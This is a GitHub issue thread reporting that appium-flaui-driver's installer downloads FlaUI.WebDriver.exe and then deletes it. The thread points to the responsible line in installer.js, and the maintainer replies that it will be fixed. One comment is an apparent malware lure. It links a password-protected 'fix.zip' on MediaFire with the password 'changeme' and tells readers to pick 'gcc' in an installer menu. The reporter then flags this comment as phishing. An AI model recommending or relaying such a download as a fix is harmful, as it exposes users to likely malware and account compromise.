### ISSUE TITLE
Install does not work

### ISSUE THREAD

**Issue by aristotelos** [picakia/appium-flaui-driver#16]
Installing appium-flaui-driver does not download FlaUI.WebDriver.exe for me automatically.

When I run `node .\node_modules\appium-flaui-driver\install-npm.js` manually, I see that it is downloaded and then immediately discarded. That is because it is a copy of appium-windows-driver that downloads, runs the installer, and deletes the installer. But for FlaUI.WebDriver, it should download FlaUI.WebDriver.exe and leave it there.

The code that removes the executable after downloading: https://github.com/picakia/appium-flaui-driver/blob/e55b2577f0937bec4e0c4bed80137dc80ec32f3f/lib/installer.js#L94

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by aristotelos** [comment]
@haohaohaoadsad Is your account hacked? I have reported your previous comment as phishing activity because it is not explaining any relation to the issue and seems to provide a malicious link.

**Comment by picakia** [comment]
Yeah, I never had time to figure this out, when I have some time I will fix this issue, thanks for pointing the line in the code!
